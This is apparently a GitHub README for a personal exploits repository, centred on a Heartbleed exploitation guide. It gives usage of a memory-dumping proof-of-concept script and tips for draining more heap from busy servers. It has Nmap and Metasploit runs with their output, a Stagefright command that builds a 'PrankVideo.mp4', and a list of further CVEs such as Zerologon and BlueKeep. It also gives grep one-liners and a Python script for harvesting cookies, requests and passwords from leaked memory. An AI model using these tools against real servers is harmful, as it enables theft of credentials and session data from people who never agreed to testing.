Exploits
--------

Exploits R&D

Repository: https://github.com/vs4vijay/exploits (owner: vs4vijay; primary language: Python; created 2014-04-10, last push 2024-05-25; 19 stars, 10 forks; no license file). Corpus record: https://awesome.ecosyste.ms/projects/github.com%2Fvs4vijay%2Fexploits

Topics: blueducky, bluekeep, buffer-overflow, c99, cve, exploit, exploits, heap-overflow, heartbleed, infosec, lpe, pentest, pentesting, poc, rce, red-team, security, shell, stack-overflow



# HeartBleed Exploit

## Tool Guide


* If you want to mass scan, the Nmap NSE script is currently your best bet.
* For the widest protocol support (STARTTLS), use the modified Metasploit module.
* If you want to actually exploit (dump memory), use the Python script; modifications are required for STARTTLS on anything other than SMTP.


Usage: heartbleed-poc.py server [options]

Test for SSL heartbeat vulnerability (CVE-2014-0160)

Options:
  -h, --help            show this help message and exit
  -p PORT, --port=PORT  TCP port to test (default: 443)
  -n NUM, --num=NUM     Number of heartbeats to send if vulnerable (defines
                        how much memory you get back) (default: 1)
  -f FILE, --file=FILE  Filename to write dumped memory to (default:
                        dump.bin)
  -q, --quiet           Do not display the memory dump
  -s, --starttls        Check STARTTLS (smtp only right now)

Examples

* Normal scan, hits port 443 with 1 iteration:
python heartbleed-poc.py example.com

* Dump memory scan, makes 100 requests and writes the output to the binary file dump.bin:
python heartbleed-poc.py -n100 -f dump.bin example.com

To make sure you get different parts of the heap, make sure the server is busy; otherwise you end up dumping the same region again and again. Each heartbeat returns at most 64 KB, so more iterations against a busy server cover more of the process heap.

* Check a mail server with STARTTLS (i.e. port 25):
python heartbleed-poc.py -s -p 25 example.com

* There used to be a -v switch to make the TLS version explicit; the version is auto-detected now and the switch has been removed.

### Find Juice

The binary file will have juicy output in it; here are some simple ways of finding the goods (the -a flag makes grep and pcregrep treat the binary dump as text instead of reporting "Binary file matches"):

* HTTP request:
awk '/[HPG][UEO][AST][DT ]/,/Connection/' dump.bin

* Cookies:
grep -a "^Cookie:" dump.bin

* Interesting key/value pairs:
pcregrep -ao "[A-Za-z0-9_-]+=[0-9a-zA-Z]+" dump.bin

### NMAP NSE Script


Usage:
nmap --script=ssl-heartbleed -p 443 <server>

Example Output:

Starting Nmap 6.41SVN ( http://nmap.org ) at 2014-04-09 17:27 SAST
Nmap scan report for <example.org> (1.2.3.4)
Host is up (0.0068s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|     Description:
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|       
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://www.openssl.org/news/secadv_20140407.txt 
|_      http://cvedetails.com/cve/2014-0160/

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

### Metasploit Module

msf > use auxiliary/scanner/ssl/openssl_heartbleed 
msf auxiliary(openssl_heartbleed) > show options

Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       443              yes       The target port
   STARTTLS    None             yes       Protocol to use with STARTTLS, None to avoid STARTTLS  (accepted: None, SMTP, IMAP, JABBER, POP3, FTP)
   THREADS     1                yes       The number of concurrent threads
   TLSVERSION  1.0              yes       TLS version to use (accepted: 1.0, 1.1, 1.2)

msf auxiliary(openssl_heartbleed) > set RHOSTS example.org
RHOSTS => example.org
msf auxiliary(openssl_heartbleed) > set STARTTLS FTP
STARTTLS => FTP
msf auxiliary(openssl_heartbleed) > set RPORT 21
RPORT => 21
msf auxiliary(openssl_heartbleed) > exploit

[*] 37.187.134.197:21 - Trying to start SSL via FTP
[*] 37.187.134.197:21 - Sending Client Hello...
[*] 37.187.134.197:21 - Sending Heartbeat...
[*] 37.187.134.197:21 - Heartbeat response, checking if there is data leaked...
[+] 37.187.134.197:21 - Heartbeat response with leak
[*] 37.187.134.197:21 - Printable info leaked: @SE F(CKMIWsf"!98532ED/A
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The module only confirms that the heartbeat response carried leaked bytes; it does not dump memory. Use the Python script with -n for that.

---

# Stagefright Exploit

```bash
stagefright_2.py -c 192.168.1.2 -p 444 -o PrankVideo.mp4
```

---

### Development Notes

Items tracked for development:

* CVE-2020-17382
* CVE-2023-45866 (BlueDucky), pulled in as a submodule:

```bash
git submodule add https://github.com/pentestfunctions/BlueDucky CVE-2023-45866-BlueDucky/BlueDucky
```

* CVE-2020-1472 (Zerologon)
* CVE-2021-44228 (Log4j)
* CVE-2019-0708 (BlueKeep)
* CVE-2020-16898 (Bad Neighbor)
* CVE-2020-0796 (SMBGhost)
* RPC DCOM

Reference collections:

* https://github.com/nomi-sec/PoC-in-GitHub
* https://github.com/swisskyrepo/PayloadsAllTheThings
* https://github.com/liamg/traitor
* https://github.com/S3cur3Th1sSh1t/WinPwn
* https://github.com/The-Z-Labs/linux-exploit-suggester
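The Find Juice one-liners above treat dump.bin as text. The following added example (not part of the repository) does the same extraction in Python on raw bytes: the awk range trick is replaced by a regex that takes a request line plus the well-formed header lines after it, the Cookie grep is kept as a line-anchored match, and the key=value search gets a minimum value length because pcregrep's pattern also returns one-character matches from binary noise. The regexes, function names and the embedded SAMPLE_DUMP are constructed for this example; the sample is not real leaked memory.

```python
"""Extract HTTP requests, cookies and key=value pairs from a Heartbleed memory dump.
Added example; the patterns and the sample dump below are constructed, not from the repo."""
import re
import sys

# Request line followed by any number of well-formed "Name: value" header lines.
REQUEST_RE = re.compile(
    rb"(?:GET|POST|PUT|HEAD|DELETE|OPTIONS|PATCH) [^\r\n]{1,512} HTTP/1\.[01]\r?\n"
    rb"(?:[A-Za-z0-9-]+: [^\r\n]*\r?\n)*")
COOKIE_RE = re.compile(rb"^Cookie: ([^\r\n]+)", re.M)          # same anchor as grep "^Cookie:"
KV_RE = re.compile(rb"[A-Za-z0-9_-]+=[0-9A-Za-z]+")             # same class as the pcregrep
STRINGS_RE = re.compile(rb"[\x20-\x7e]{8,}")                     # printable runs, like strings(1)


def unique(items):
    """Preserve first-seen order while dropping repeats (busy dumps repeat a lot)."""
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def find_requests(dump):
    return unique(m.group(0) for m in REQUEST_RE.finditer(dump))


def find_cookies(dump):
    return unique(m.group(1) for m in COOKIE_RE.finditer(dump))


def find_pairs(dump, min_value_len=4):
    """key=value hits whose value is at least min_value_len long; shorter ones are
    mostly binary bytes that happen to fall in the letter/digit range."""
    return unique(m.group(0) for m in KV_RE.finditer(dump)
                  if len(m.group(0).split(b"=", 1)[1]) >= min_value_len)


def find_strings(dump):
    return unique(STRINGS_RE.findall(dump))


# Constructed sample dump (not real leaked data): binary noise around two requests.
SAMPLE_DUMP = (
    b"\x00\x17\x9a\xff\x10\x00\x00\x00" * 2
    + b"POST /login HTTP/1.1\r\n"
      b"Host: example.com\r\n"
      b"Cookie: session=abc123; theme=dark\r\n"
      b"Content-Type: application/x-www-form-urlencoded\r\n"
      b"Connection: keep-alive\r\n"
      b"\r\n"
      b"user=alice&pass=hunter2\r\n"
    + b"\x8a\x02\x00\x00\x00\x00\x00\x00\x7f\x00" * 3
    + b"GET /img/logo.png HTTP/1.1\r\n"
      b"Host: example.com\r\n"
      b"Connection: close\r\n"
      b"\r\n"
    + b"\xff" * 8
)


def report(dump):
    """Print the three views the README's one-liners give, plus printable strings."""
    for title, items in (("HTTP requests", find_requests(dump)),
                         ("Cookies", find_cookies(dump)),
                         ("Key/value pairs", find_pairs(dump)),
                         ("Printable strings", find_strings(dump))):
        print(f"== {title} ({len(items)})")
        for item in items:
            print(item.decode("latin-1").rstrip())


if __name__ == "__main__":
    # python3 juice.py dump.bin   (runs on the constructed sample when no file is given)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    report(data)
```

Keep the dump handling in bytes throughout: decoding the whole file first would either fail or silently drop the very bytes that sit between two interesting fragments.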